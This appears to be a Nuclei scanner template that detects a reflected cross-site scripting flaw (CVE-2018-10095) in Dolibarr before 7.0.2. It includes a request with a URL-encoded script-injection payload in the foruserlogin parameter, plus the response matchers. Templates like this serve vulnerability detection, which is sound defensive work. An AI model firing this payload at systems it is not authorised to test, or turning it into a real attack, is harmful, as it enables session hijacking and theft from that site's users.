id: CVE-2018-10095 info: name: Dolibarr <7.0.2 - Cross-Site Scripting author: pikpikcu severity: medium description: | Dolibarr before 7.0.2 is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the foruserlogin parameter to adherents/cartes/carte.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Dolibarr version 7.0.2 or later to mitigate this vulnerability. reference: - https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability/ - https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56 - https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog - https://nvd.nist.gov/vuln/detail/CVE-2018-10095 - http://www.openwall.com/lists/oss-security/2018/05/21/3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-10095 cwe-id: CWE-79 epss-score: 0.95296 epss-percentile: 0.99346 cpe: cpe:2.3:a:dolibarr:dolibarr:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dolibarr product: dolibarr tags: cve2018,cve,xss,dolibarr http: - method: GET path: - "{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print" matchers-condition: and matchers: - type: word part: body words: - '' - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402201ab33550c9971f20a65798766c82385bc8e6fe158999548e9a1a8124597210e00220214c234455df0e7be4bc246ef96843d14c08d85ad76a5b1cc620b3c7e885d79c:922c64590222798bb761d5b6d8e72950